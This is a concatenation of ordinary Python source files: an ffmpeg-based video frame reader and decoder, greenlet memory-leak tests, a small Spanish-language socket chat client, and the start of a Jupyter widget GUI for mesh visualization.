            # DEVNULL instead of open("/dev/null"): the old code leaked the
            # file object and opened the null device *read-only*, so ffmpeg
            # could not actually write its stderr to it.
            stdin=tmpf, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)

        dat = proc.stdout.read()
        if proc.wait() != 0:
            raise DataUnreadableError("ffmpeg failed")

    if pix_fmt == "rgb24":
        ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
    elif pix_fmt == "yuv420p":
        ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h * w * 3 // 2))
    elif pix_fmt == "yuv444p":
        ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
    else:
        raise NotImplementedError

    return ret
class VideoStreamDecompressor(object):
    """Long-lived ffmpeg decoder: write() compressed packets in, read() raw frames out.

    A daemon thread drains ffmpeg's stdout into a queue in whole-frame
    chunks so that writers never deadlock against a full stdout pipe.
    """

    def __init__(self, vid_fmt, w, h, pix_fmt, multithreaded=False):
        self.vid_fmt = vid_fmt
        self.w = w
        self.h = h
        self.pix_fmt = pix_fmt

        # Bytes per decoded frame for the requested output format.
        if pix_fmt == "yuv420p":
            self.out_size = w * h * 3 // 2  # yuv420p
        elif pix_fmt in ("rgb24", "yuv444p"):
            self.out_size = w * h * 3
        else:
            raise NotImplementedError

        self.out_q = queue.Queue()

        self.proc = subprocess.Popen(
            ["ffmpeg",
             "-threads", "0" if multithreaded else "1",
             # low-latency probing so decoding starts immediately
             "-analyzeduration", "0",
             "-probesize", "32",
             "-flush_packets", "0",
             "-vsync", "0",
             "-f", vid_fmt,
             "-i", "pipe:0",
             "-threads", "0" if multithreaded else "1",
             "-f", "rawvideo",
             "-pix_fmt", pix_fmt,
             "pipe:1"],
            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
            # DEVNULL instead of open("/dev/null", "wb"): no leaked file
            # object, and portable beyond POSIX.
            stderr=subprocess.DEVNULL)

        def read_thread():
            # Drain ffmpeg stdout one whole frame at a time until EOF.
            while True:
                r = self.proc.stdout.read(self.out_size)
                if len(r) == 0:
                    break
                assert len(r) == self.out_size
                self.out_q.put(r)

        self.t = threading.Thread(target=read_thread)
        self.t.daemon = True
        self.t.start()

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.close()

    def write(self, rawdat):
        """Feed compressed input bytes to the decoder."""
        self.proc.stdin.write(rawdat)
        self.proc.stdin.flush()

    def read(self):
        """Block until one decoded frame is available and return it
        (rgb24: HxWx3, yuv420p: flat, yuv444p: 3xHxW)."""
        dat = self.out_q.get(block=True)
        if self.pix_fmt == "rgb24":
            ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
        elif self.pix_fmt == "yuv420p":
            ret = np.frombuffer(dat, dtype=np.uint8)
        elif self.pix_fmt == "yuv444p":
            ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
        else:
            assert False
        return ret

    def eos(self):
        """Signal end of input; ffmpeg flushes and exits once drained."""
        self.proc.stdin.close()

    def close(self):
        self.proc.stdin.close()
        self.t.join()
        # wait() once and assert success (the original waited twice).
        ret = self.proc.wait()
        assert ret == 0
class MKVFrameReader(BaseFrameReader):
    """Frame reader for FFV1/FFVHUFF-coded Matroska files, using a
    prebuilt per-frame index for random access."""

    def __init__(self, fn):
        self.fn = fn

        #print("MKVFrameReader", fn)
        index_data = index_mkv(fn)
        stream = index_data['probe']['streams'][0]
        self.w = stream['width']
        self.h = stream['height']

        if stream['codec_name'] == 'ffv1':
            self.frame_type = FrameType.ffv1_mkv
        elif stream['codec_name'] == 'ffvhuff':
            self.frame_type = FrameType.ffvhuff_mkv
        else:
            raise NotImplementedError

        self.config_record = index_data['config_record']
        self.index = index_data['index']

        self.frame_count = len(self.index)

    def get(self, num, count=1, pix_fmt="yuv420p"):
        """Decode `count` frames starting at `num`.

        Reads the indexed frame payloads, wraps them into a minimal MKV
        container via mkvindex.simple_gen, and feeds that to ffmpeg.
        """
        assert 0 < num+count <= self.frame_count

        frame_dats = []
        with FileReader(self.fn) as f:
            for i in range(num, num+count):
                # index entries are (byte position, byte length, ...).
                pos, length, _ = self.index[i]
                f.seek(pos)
                frame_dats.append(f.read(length))

        of = StringIO()
        # NOTE(review): StringIO is text-only on Python 3; the payloads read
        # above are presumably bytes, which would require BytesIO — confirm
        # which StringIO this module imports.
        mkvindex.simple_gen(of, self.config_record, self.w, self.h, frame_dats)

        r = decompress_video_data(of.getvalue(), "matroska", self.w, self.h, pix_fmt)
        assert len(r) == count
        return r
class GOPReader(object):
    """Interface for readers that can fetch whole groups of pictures."""

    def get_gop(self, num):
        """Return (start_frame_num, num_frames, frames_to_skip, gop_data)."""
        raise NotImplementedError
class DoNothingContextManager(object):
    """No-op context manager, used as a stand-in when no locking is needed."""

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, tb):
        # Explicit protocol signature instead of the old `def __exit__(*x)`,
        # which relied on `self` being swallowed by *x. Returning None
        # (falsy) still propagates any exception, as before.
        pass
class GOPFrameReader(BaseFrameReader):
    #FrameReader with caching and readahead for formats that are group-of-picture based

    def __init__(self, readahead=False, readbehind=False, multithreaded=True):
        # Liveness flag checked by the readahead thread on every wakeup.
        self.open_ = True
        self.multithreaded = multithreaded
        self.readahead = readahead
        self.readbehind = readbehind
        # Decoded-frame cache keyed by (frame_number, pix_fmt).
        # NOTE(review): LRU comes from elsewhere in the project; presumably a
        # bounded least-recently-used mapping of 64 entries — confirm.
        self.frame_cache = LRU(64)

        if self.readahead:
            self.cache_lock = threading.RLock()
            self.readahead_last = None
            self.readahead_len = 30
            self.readahead_c = threading.Condition()
            self.readahead_thread = threading.Thread(target=self._readahead_thread)
            self.readahead_thread.daemon = True
            self.readahead_thread.start()
        else:
            # Without readahead there is no concurrent cache access, so the
            # "lock" can be a no-op.
            self.cache_lock = DoNothingContextManager()

    def close(self):
        if not self.open_:
            return
        self.open_ = False

        # Wake the readahead thread so it observes open_ == False and exits.
        if self.readahead:
            self.readahead_c.acquire()
            self.readahead_c.notify()
            self.readahead_c.release()
            self.readahead_thread.join()

    def _readahead_thread(self):
        """Background loop: after each get(), warm the cache around the
        position recorded in readahead_last."""
        while True:
            self.readahead_c.acquire()
            try:
                if not self.open_:
                    break
                self.readahead_c.wait()
            finally:
                self.readahead_c.release()
            if not self.open_:
                break

            assert self.readahead_last
            num, pix_fmt = self.readahead_last

            if self.readbehind:
                for k in range(num-1, max(0, num-self.readahead_len), -1):
                    self._get_one(k, pix_fmt)
            else:
                for k in range(num, min(self.frame_count, num+self.readahead_len)):
                    self._get_one(k, pix_fmt)

    def _get_one(self, num, pix_fmt):
        """Return frame `num`, decoding (and caching) its whole GOP on a miss."""
        assert num < self.frame_count

        if (num, pix_fmt) in self.frame_cache:
            return self.frame_cache[(num, pix_fmt)]

        with self.cache_lock:
            # Re-check under the lock: another thread may have decoded it
            # while we were waiting.
            if (num, pix_fmt) in self.frame_cache:
                return self.frame_cache[(num, pix_fmt)]

            frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)

            ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt,
                                        multithreaded=self.multithreaded)
            # Drop decoder warm-up frames that precede the requested range.
            ret = ret[skip_frames:]
            assert ret.shape[0] == num_frames

            # Cache every frame of the GOP, not just the requested one.
            for i in range(ret.shape[0]):
                self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]

            return self.frame_cache[(num, pix_fmt)]

    def get(self, num, count=1, pix_fmt="yuv420p"):
        """Return `count` decoded frames starting at `num` as a list; also
        kicks the readahead thread (if enabled) toward num+count."""
        assert self.frame_count is not None

        if num + count > self.frame_count:
            raise ValueError("{} > {}".format(num + count, self.frame_count))
        if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
            raise ValueError("Unsupported pixel format %r" % pix_fmt)

        ret = [self._get_one(num + i, pix_fmt) for i in range(count)]

        if self.readahead:
            self.readahead_last = (num+count, pix_fmt)
            self.readahead_c.acquire()
            self.readahead_c.notify()
            self.readahead_c.release()

        return ret
class MP4GOPReader(GOPReader):
    """GOP reader for H.264 video stored in an MP4 container.

    MP4 samples hold length-prefixed NALUs; get_gop() rewraps a GOP's
    samples as an Annex-B bytestream (00 00 00 01 start codes), prefixed
    with the SPS/PPS, so ffmpeg can decode the GOP in isolation.
    """

    def __init__(self, fn):
        self.fn = fn
        self.frame_type = FrameType.h264_mp4
        self.index = index_mp4(fn)

        self.w = self.index['width']
        self.h = self.index['height']
        self.sample_sizes = self.index['sample_sizes']
        self.sample_offsets = self.index['sample_offsets']
        self.sample_dependency = self.index['sample_dependency']

        self.vid_fmt = "h264"
        self.frame_count = len(self.sample_sizes)

        # bytes, not str: the assembled GOP is written to a binary tempfile
        # by decompress_video_data, and str+bytes concatenation raises
        # TypeError on Python 3. (Assumes index_mp4 returns sps/pps as
        # bytes — confirm.)
        self.prefix = b"\x00\x00\x00\x01" + self.index['sps'] + \
                      b"\x00\x00\x00\x01" + self.index['pps']

    def _lookup_gop(self, num):
        """Return the half-open frame range [frame_b, frame_e) of the GOP
        containing `num`. sample_dependency[i] truthy presumably means frame
        i depends on an earlier frame (is not an I/IDR frame) — confirm."""
        frame_b = num
        while frame_b > 0 and self.sample_dependency[frame_b]:
            frame_b -= 1

        frame_e = num + 1
        while frame_e < (len(self.sample_dependency) - 1) and self.sample_dependency[frame_e]:
            frame_e += 1

        return (frame_b, frame_e)

    def get_gop(self, num):
        """Return (frame_b, num_frames, 0, annexb_bytes) for `num`'s GOP."""
        frame_b, frame_e = self._lookup_gop(num)
        assert frame_b <= num < frame_e

        num_frames = frame_e - frame_b

        with FileReader(self.fn) as f:
            rawdat = []

            sample_i = frame_b
            while sample_i < frame_e:
                size = self.sample_sizes[sample_i]
                start_offset = self.sample_offsets[sample_i]

                # try to read contiguously because a read could actually be a http request
                sample_i += 1
                while sample_i < frame_e and size < 10000000 and start_offset + size == self.sample_offsets[sample_i]:
                    size += self.sample_sizes[sample_i]
                    sample_i += 1

                f.seek(start_offset)
                sampledat = f.read(size)

                # read length-prefixed NALUs and output in Annex-B
                i = 0
                while i < len(sampledat):
                    nal_len, = struct.unpack(">I", sampledat[i:i + 4])
                    rawdat.append(b"\x00\x00\x00\x01" + sampledat[i + 4:i + 4 + nal_len])
                    i = i + 4 + nal_len
                assert i == len(sampledat)

            rawdat = self.prefix + b"".join(rawdat)

        return frame_b, num_frames, 0, rawdat
class MP4FrameReader(MP4GOPReader, GOPFrameReader):
    """Frame-level access to an MP4 file, with optional readahead caching."""

    def __init__(self, fn, readahead=False):
        MP4GOPReader.__init__(self, fn)
        GOPFrameReader.__init__(self, readahead=readahead)
class StreamGOPReader(GOPReader):
    """GOP reader for raw H.265/H.264 elementary streams, driven by a
    prebuilt per-frame index (index_data)."""

    def __init__(self, fn, frame_type, index_data):
        self.fn = fn
        self.frame_type = frame_type
        self.frame_count = None
        self.w, self.h = None, None

        self.prefix = None
        self.index = None

        self.index = index_data['index']
        # Stream-global header bytes prepended to every GOP handed to ffmpeg.
        self.prefix = index_data['global_prefix']
        probe = index_data['probe']

        if self.frame_type == FrameType.h265_stream:
            self.prefix_frame_data = None
            self.num_prefix_frames = 0
            self.vid_fmt = "hevc"

        elif self.frame_type == FrameType.h264_pstream:
            # An h264 "pstream" may begin mid-GOP: frames before the first
            # I-slice need extra prefix frames prepended to decode.
            self.prefix_frame_data = index_data['prefix_frame_data']
            self.num_prefix_frames = index_data['num_prefix_frames']

            self.vid_fmt = "h264"

        i = 0
        # Locate the first I-slice; index[:, 0] holds per-frame slice types.
        while i < self.index.shape[0] and self.index[i, 0] != SLICE_I:
            i += 1
        self.first_iframe = i

        if self.frame_type == FrameType.h265_stream:
            assert self.first_iframe == 0

        self.frame_count = len(self.index)-1

        self.w = probe['streams'][0]['width']
        self.h = probe['streams'][0]['height']

    def _lookup_gop(self, num):
        """Return (frame_b, frame_e, offset_b, offset_e): the frame range of
        `num`'s GOP and its byte extent in the file (index[:, 1] holds the
        per-frame byte offsets)."""
        frame_b = num
        while frame_b > 0 and self.index[frame_b, 0] != SLICE_I:
            frame_b -= 1

        frame_e = num+1
        while frame_e < (len(self.index)-1) and self.index[frame_e, 0] != SLICE_I:
            frame_e += 1

        offset_b = self.index[frame_b, 1]
        offset_e = self.index[frame_e, 1]

        return (frame_b, frame_e, offset_b, offset_e)

    def get_gop(self, num):
        """Return (frame_b, num_frames, skip_frames, rawdat) where rawdat is
        the GOP's bytes with global (and, if needed, prefix-frame) headers."""
        frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
        assert frame_b <= num < frame_e

        num_frames = frame_e-frame_b

        with FileReader(self.fn) as f:
            f.seek(offset_b)
            rawdat = f.read(offset_e-offset_b)

            if num < self.first_iframe:
                # Frames before the first I-slice only decode with the extra
                # prefix frames; the decoder output for those is skipped below.
                assert self.prefix_frame_data
                rawdat = self.prefix_frame_data + rawdat

            rawdat = self.prefix + rawdat

        skip_frames = 0
        if num < self.first_iframe:
            skip_frames = self.num_prefix_frames

        return frame_b, num_frames, skip_frames, rawdat
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
    """Random-access frame reader over an indexed raw video stream."""

    def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False, multithreaded=False):
        StreamGOPReader.__init__(self, fn, frame_type, index_data)
        GOPFrameReader.__init__(self, readahead=readahead, readbehind=readbehind,
                                multithreaded=multithreaded)
def GOPFrameIterator(gop_reader, pix_fmt, multithreaded=True):
    """Yield every frame of `gop_reader` in order, streaming whole GOPs
    through a single ffmpeg decoder and keeping a bounded number of GOPs
    in flight."""
    # this is really ugly. ill think about how to refactor it when i can think good
    IN_FLIGHT_GOPS = 6 # should be enough that the stream decompressor starts returning data

    with VideoStreamDecompressor(
        gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt, multithreaded) as dec:

        # Per submitted GOP, in submission order:
        # [frames_still_to_skip, frames_still_to_yield].
        read_work = []

        def readthing():
            # Consume one decoded frame; drop it if the front GOP still has
            # warm-up frames to skip, otherwise yield it.
            # print read_work, dec.out_q.qsize()
            outf = dec.read()
            read_thing = read_work[0]
            if read_thing[0] > 0:
                read_thing[0] -= 1
            else:
                assert read_thing[1] > 0
                yield outf
                read_thing[1] -= 1
                if read_thing[1] == 0:
                    read_work.pop(0)

        i = 0
        while i < gop_reader.frame_count:
            frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i)
            dec.write(gop_data)
            i += num_frames
            read_work.append([skip_frames, num_frames])

            # Backpressure: drain decoded frames once enough GOPs are queued.
            while len(read_work) >= IN_FLIGHT_GOPS:
                for v in readthing(): yield v

        # No more input; drain everything that is still pending.
        dec.eos()
        while read_work:
            for v in readthing(): yield v
def FrameIterator(fn, pix_fmt, **kwargs):
    """Yield successive frames of `fn` decoded to `pix_fmt`.

    GOP-based readers are streamed through GOPFrameIterator; other readers
    are stepped one frame at a time.
    """
    reader = FrameReader(fn, **kwargs)
    if not isinstance(reader, GOPReader):
        for i in range(reader.frame_count):
            yield reader.get(i, pix_fmt=pix_fmt)[0]
        return
    mt = kwargs.get("multithreaded", True)
    for frame in GOPFrameIterator(reader, pix_fmt, mt):
        yield frame
def FrameWriter(ofn, frames, vid_fmt=FrameType.ffvhuff_mkv, pix_fmt="rgb24", framerate=20, multithreaded=False):
    """Encode an iterable of frames (numpy arrays) into a lossless MKV at `ofn`.

    The frame size is inferred from the first frame: H x W x 3 for rgb24,
    or a (h*3//2) x w planar buffer for yuv420p. Raises NotImplementedError
    for unsupported formats and asserts that ffmpeg exits cleanly.
    """
    if pix_fmt not in ("rgb24", "yuv420p"):
        raise NotImplementedError

    if vid_fmt == FrameType.ffv1_mkv:
        assert ofn.endswith(".mkv")
        vcodec = "ffv1"
    elif vid_fmt == FrameType.ffvhuff_mkv:
        assert ofn.endswith(".mkv")
        vcodec = "ffvhuff"
    else:
        raise NotImplementedError

    # Pull the first frame eagerly so we can size the encoder; works for
    # any iterable, including generators.
    frame_gen = iter(frames)
    first_frame = next(frame_gen)

    if pix_fmt == "rgb24":
        h, w = first_frame.shape[:2]
    elif pix_fmt == "yuv420p":
        # Planar yuv420 buffers are h*3/2 rows of w bytes.
        w = first_frame.shape[1]
        h = 2 * first_frame.shape[0] // 3
    else:
        raise NotImplementedError

    compress_proc = subprocess.Popen(
        ["ffmpeg",
         "-threads", "0" if multithreaded else "1",
         "-y",
         "-framerate", str(framerate),
         "-vsync", "0",
         "-f", "rawvideo",
         "-pix_fmt", pix_fmt,
         "-s", "%dx%d" % (w, h),
         "-i", "pipe:0",
         "-threads", "0" if multithreaded else "1",
         "-f", "matroska",
         "-vcodec", vcodec,
         "-g", "0",
         ofn],
        # DEVNULL instead of open("/dev/null", "wb"): no leaked file object.
        stdin=subprocess.PIPE, stderr=subprocess.DEVNULL)
    try:
        compress_proc.stdin.write(first_frame.tobytes())
        for frame in frame_gen:
            compress_proc.stdin.write(frame.tobytes())
        compress_proc.stdin.close()
    except BaseException:
        # BaseException (not bare except) keeps the original semantics:
        # kill ffmpeg on *any* failure, including KeyboardInterrupt, then
        # re-raise rather than deadlocking on a half-written pipe.
        compress_proc.kill()
        raise
    assert compress_proc.wait() == 0
if __name__ == "__main__":
    # Ad-hoc smoke test: stream-decode one recorded camera segment and dump
    # its frames. The "cd:/..." path is presumably resolved by the project's
    # FileReader (not a local filesystem path) — confirm.
    fn = "cd:/1c79456b0c90f15a/2017-05-10--08-17-00/2/fcamera.hevc"
    f = FrameReader(fn)
    # print f.get(0, 1).shape
    # print f.get(15, 1).shape
    for v in GOPFrameIterator(f, "yuv420p"):
        print(v)
|
test_leaks.py | """
Testing scenarios that may have leaked.
"""
from __future__ import print_function, absolute_import, division
import sys
import gc
import time
import weakref
import threading
import greenlet
from . import TestCase
from .leakcheck import fails_leakcheck
try:
from sys import intern
except ImportError:
# Python 2
pass
assert greenlet.GREENLET_USE_GC # Option to disable this was removed in 1.0
class HasFinalizerTracksInstances(object):
    """Object whose finalizer records its destruction.

    Live instance ids are kept in the class-level EXTANT_INSTANCES set so a
    leak test can assert the set is empty after collection.
    """

    EXTANT_INSTANCES = set()

    def __init__(self, msg):
        self.msg = intern(msg)
        type(self).EXTANT_INSTANCES.add(id(self))

    def __del__(self):
        type(self).EXTANT_INSTANCES.remove(id(self))

    def __repr__(self):
        return "<HasFinalizerTracksInstances at 0x%x %r>" % (id(self), self.msg)

    @classmethod
    def reset(cls):
        cls.EXTANT_INSTANCES.clear()
class TestLeaks(TestCase):
    """Regression tests for reference and memory leaks in greenlet,
    especially around greenlets dying in other threads (issues 251/252)."""

    def test_arg_refs(self):
        """Switching positional args through a greenlet must not leak refs."""
        args = ('a', 'b', 'c')
        refcount_before = sys.getrefcount(args)
        # pylint:disable=unnecessary-lambda
        g = greenlet.greenlet(
            lambda *args: greenlet.getcurrent().parent.switch(*args))
        for _ in range(100):
            g.switch(*args)
        self.assertEqual(sys.getrefcount(args), refcount_before)

    def test_kwarg_refs(self):
        """Switching keyword args through a greenlet must not leak refs."""
        kwargs = {}
        # pylint:disable=unnecessary-lambda
        g = greenlet.greenlet(
            lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
        for _ in range(100):
            g.switch(**kwargs)
        self.assertEqual(sys.getrefcount(kwargs), 2)

    @staticmethod
    def __recycle_threads():
        # By introducing a thread that does sleep we allow other threads,
        # that have triggered their __block condition, but did not have a
        # chance to deallocate their thread state yet, to finally do so.
        # The way it works is by requiring a GIL switch (different thread),
        # which does a GIL release (sleep), which might do a GIL switch
        # to finished threads and allow them to clean up.
        def worker():
            time.sleep(0.001)
        t = threading.Thread(target=worker)
        t.start()
        time.sleep(0.001)
        t.join(10)

    def test_threaded_leak(self):
        """Main greenlets of finished threads must become collectable."""
        gg = []
        def worker():
            # only main greenlet present
            gg.append(weakref.ref(greenlet.getcurrent()))
        for _ in range(2):
            t = threading.Thread(target=worker)
            t.start()
            t.join(10)
        del t
        greenlet.getcurrent() # update ts_current
        self.__recycle_threads()
        greenlet.getcurrent() # update ts_current
        gc.collect()
        greenlet.getcurrent() # update ts_current
        for g in gg:
            self.assertIsNone(g())

    def test_threaded_adv_leak(self):
        """Like test_threaded_leak, but with extra finished child greenlets."""
        gg = []
        def worker():
            # main and additional *finished* greenlets
            ll = greenlet.getcurrent().ll = []
            def additional():
                ll.append(greenlet.getcurrent())
            for _ in range(2):
                greenlet.greenlet(additional).switch()
            gg.append(weakref.ref(greenlet.getcurrent()))
        for _ in range(2):
            t = threading.Thread(target=worker)
            t.start()
            t.join(10)
        del t
        greenlet.getcurrent() # update ts_current
        self.__recycle_threads()
        greenlet.getcurrent() # update ts_current
        gc.collect()
        greenlet.getcurrent() # update ts_current
        for g in gg:
            self.assertIsNone(g())

    def assertClocksUsed(self):
        # Assert the optional-cleanup clock accounting is active: a
        # non-negative value that survives re-enabling cleanup.
        used = greenlet._greenlet.get_clocks_used_doing_optional_cleanup()
        self.assertGreaterEqual(used, 0)
        # we don't lose the value
        greenlet._greenlet.enable_optional_cleanup(True)
        used2 = greenlet._greenlet.get_clocks_used_doing_optional_cleanup()
        self.assertEqual(used, used2)
        self.assertGreater(greenlet._greenlet.CLOCKS_PER_SEC, 1)

    def _check_issue251(self,
                        manually_collect_background=True,
                        explicit_reference_to_switch=False):
        # See https://github.com/python-greenlet/greenlet/issues/251
        # Killing a greenlet (probably not the main one)
        # in one thread from another thread would
        # result in leaking a list (the ts_delkey list).
        # We no longer use lists to hold that stuff, though.

        # For the test to be valid, even empty lists have to be tracked by the
        # GC
        assert gc.is_tracked([])
        HasFinalizerTracksInstances.reset()
        greenlet.getcurrent()
        greenlets_before = self.count_objects(greenlet.greenlet, exact_kind=False)

        background_glet_running = threading.Event()
        background_glet_killed = threading.Event()
        background_greenlets = []

        # XXX: Switching this to a greenlet subclass that overrides
        # run results in all callers failing the leaktest; that
        # greenlet instance is leaked. There's a bound method for
        # run() living on the stack of the greenlet in g_initialstub,
        # and since we don't manually switch back to the background
        # greenlet to let it "fall off the end" and exit the
        # g_initialstub function, it never gets cleaned up. Making the
        # garbage collector aware of this bound method (making it an
        # attribute of the greenlet structure and traversing into it)
        # doesn't help, for some reason.
        def background_greenlet():
            # Throw control back to the main greenlet.
            jd = HasFinalizerTracksInstances("DELETING STACK OBJECT")
            greenlet._greenlet.set_thread_local(
                'test_leaks_key',
                HasFinalizerTracksInstances("DELETING THREAD STATE"))
            # Explicitly keeping 'switch' in a local variable
            # breaks this test in all versions
            if explicit_reference_to_switch:
                s = greenlet.getcurrent().parent.switch
                s([jd])
            else:
                greenlet.getcurrent().parent.switch([jd])

        bg_main_wrefs = []

        def background_thread():
            glet = greenlet.greenlet(background_greenlet)
            bg_main_wrefs.append(weakref.ref(glet.parent))

            glet.switch() # Be sure it's active.
            # Control is ours again.
            del glet # Delete one reference from the thread it runs in.
            background_glet_running.set()
            background_glet_killed.wait(10)

            # To trigger the background collection of the dead
            # greenlet, thus clearing out the contents of the list, we
            # need to run some APIs. See issue 252.
            if manually_collect_background:
                greenlet.getcurrent()

        t = threading.Thread(target=background_thread)
        t.start()
        background_glet_running.wait(10)
        greenlet.getcurrent()
        lists_before = self.count_objects(list, exact_kind=True)

        assert len(background_greenlets) == 1
        self.assertFalse(background_greenlets[0].dead)
        # Delete the last reference to the background greenlet
        # from a different thread. This puts it in the background thread's
        # ts_delkey list.
        del background_greenlets[:]
        background_glet_killed.set()

        # Now wait for the background thread to die.
        t.join(10)
        del t
        # As part of the fix for 252, we need to cycle the ceval.c
        # interpreter loop to be sure it has had a chance to process
        # the pending call.
        self.wait_for_pending_cleanups()

        lists_after = self.count_objects(list, exact_kind=True)
        greenlets_after = self.count_objects(greenlet.greenlet, exact_kind=False)

        # On 2.7, we observe that lists_after is smaller than
        # lists_before. No idea what lists got cleaned up. All the
        # Python 3 versions match exactly.
        self.assertLessEqual(lists_after, lists_before)
        # On versions after 3.6, we've successfully cleaned up the
        # greenlet references thanks to the internal "vectorcall"
        # protocol; prior to that, there is a reference path through
        # the ``greenlet.switch`` method still on the stack that we
        # can't reach to clean up. The C code goes through terrific
        # lengths to clean that up.
        if not explicit_reference_to_switch and greenlet._greenlet.get_clocks_used_doing_optional_cleanup() is not None:
            # If cleanup was disabled, though, we may not find it.
            self.assertEqual(greenlets_after, greenlets_before)
            if manually_collect_background:
                # TODO: Figure out how to make this work!
                # The one on the stack is still leaking somehow
                # in the non-manually-collect state.
                self.assertEqual(HasFinalizerTracksInstances.EXTANT_INSTANCES, set())
        else:
            # The explicit reference prevents us from collecting it
            # and it isn't always found by the GC either for some
            # reason. The entire frame is leaked somehow, on some
            # platforms (e.g., MacPorts builds of Python (all
            # versions!)), but not on other platforms (the linux and
            # windows builds on GitHub actions and Appveyor). So we'd
            # like to write a test that proves that the main greenlet
            # sticks around, and we can on my machine (macOS 11.6,
            # MacPorts builds of everything) but we can't write that
            # same test on other platforms. However, hopefully iteration
            # done by leakcheck will find it.
            pass

        if greenlet._greenlet.get_clocks_used_doing_optional_cleanup() is not None:
            self.assertClocksUsed()

    def test_issue251_killing_cross_thread_leaks_list(self):
        self._check_issue251()

    def test_issue251_with_cleanup_disabled(self):
        greenlet._greenlet.enable_optional_cleanup(False)
        try:
            self._check_issue251()
        finally:
            greenlet._greenlet.enable_optional_cleanup(True)

    @fails_leakcheck
    def test_issue251_issue252_need_to_collect_in_background(self):
        # Between greenlet 1.1.2 and the next version, this was still
        # failing because the leak of the list still exists when we
        # don't call a greenlet API before exiting the thread. The
        # proximate cause is that neither of the two greenlets from
        # the background thread are actually being destroyed, even
        # though the GC is in fact visiting both objects. It's not
        # clear where that leak is? For some reason the thread-local
        # dict holding it isn't being cleaned up.
        #
        # The leak, I think, is in the CPYthon internal function that
        # calls into green_switch(). The argument tuple is still on
        # the C stack somewhere and can't be reached? That doesn't
        # make sense, because the tuple should be collectable when
        # this object goes away.
        #
        # Note that this test sometimes spuriously passes on Linux,
        # for some reason, but I've never seen it pass on macOS.
        self._check_issue251(manually_collect_background=False)

    @fails_leakcheck
    def test_issue251_issue252_need_to_collect_in_background_cleanup_disabled(self):
        self.expect_greenlet_leak = True
        greenlet._greenlet.enable_optional_cleanup(False)
        try:
            self._check_issue251(manually_collect_background=False)
        finally:
            greenlet._greenlet.enable_optional_cleanup(True)

    @fails_leakcheck
    def test_issue251_issue252_explicit_reference_not_collectable(self):
        self._check_issue251(
            manually_collect_background=False,
            explicit_reference_to_switch=True)
|
client.py | import socket
import threading
class Client:
    """Console chat client: connects to a server and relays console input,
    printing everything the server sends back."""

    def __init__(self):
        self.create_connection()

    def create_connection(self):
        """Prompt for a server address until a TCP connect succeeds, send the
        username, then start the receive and send threads."""
        # NOTE(review): the same socket object is reused after a failed
        # connect; some platforms require a fresh socket per attempt — confirm.
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        while True:
            try:
                print('ITS VILLADA ##### Sala de chat de 7mo B')
                host = input('Ingresá el IP del servidor --> ')
                port = int(input('Ingresá el puerto --> '))
                self.s.connect((host, port))
                break
            except (OSError, ValueError):
                # OSError: unreachable host/port; ValueError: non-numeric
                # port. (Was a bare `except:`, which also swallowed
                # KeyboardInterrupt, making the loop impossible to quit.)
                print("Couldn't connect to server")

        self.username = input('Ingresá tú username --> ')
        self.s.send(self.username.encode())

        message_handler = threading.Thread(target=self.handle_messages, args=())
        message_handler.start()
        input_handler = threading.Thread(target=self.input_handler, args=())
        input_handler.start()

    def handle_messages(self):
        """Print every message from the server until the connection closes."""
        while True:
            data = self.s.recv(1024)  # was recv(1204) — presumably a 1024 typo
            if not data:
                # Empty read means the server closed the connection; stop
                # instead of spinning on empty prints forever.
                break
            print(data.decode())

    def input_handler(self):
        """Forward each line of console input to the server, tagged with the
        username."""
        while True:
            self.s.send((self.username + ' - ' + input()).encode())
if __name__ == "__main__":
    # Guard the entry point so importing this module does not immediately
    # prompt the user and open a connection.
    client = Client()
|
GUI.py | import ipywidgets as widgets
import pythreejs as three
from ..utils import ColorMap, Observer, utilities
from ..visualization import colors
from IPython.display import display as ipydisplay
import threading
from time import sleep
import numpy as np
class GUI(Observer):
    def __init__(self, drawable_mesh):
        """Build the widget-based UI for `drawable_mesh` and display it.

        Registers self as an observer of the mesh geometry and displays
        every top-level widget container created by __create_UI.
        """
        self.drawable = drawable_mesh
        self.mesh = drawable_mesh.geometry
        self.mesh.attach(self)
        self.widgets = []
        self.click_picker = self.__initialize_picker()
        self.old_picked_face = None
        self.old_picked_face_internal = False
        # Flags coordinating clipping-slider callbacks: queue one extra
        # update if an event arrives while an update is already running.
        self.__clipping_in_queue = False
        self.__dont_update_clipping = False
        self.__create_UI()
        #self.wireframe_thickness_slider.observe(self.__update_wireframe_thickness, names='value')
        for widget in self.widgets:
            ipydisplay(widget)
def __create_UI(self):
self.invisible_layout = {'display':'none', 'height' : 'auto'}
self.visible_layout = {'display':'', 'height' : 'auto'}
self.flip_button_layout = {'width': 'auto',
'margin': '0px 0px 0px 10px'}
self.picking_info_layout = {'width': 'auto',
'margin': '50px 50px 50px 0px'}
self.slider_layout = {
}
self.flip_x_button = widgets.ToggleButton(
value=False,
description='Flip x',
disabled=False,
button_style='info',
tooltip='Flip the visualization range on x axis',
layout=self.flip_button_layout
)
self.flip_y_button = widgets.ToggleButton(
value=False,
description='Flip y',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='IFlip the visualization range on y axis',
layout=self.flip_button_layout
)
self.flip_z_button = widgets.ToggleButton(
value=False,
description='Flip z',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Flip the visualization range on z axis',
layout=self.flip_button_layout
)
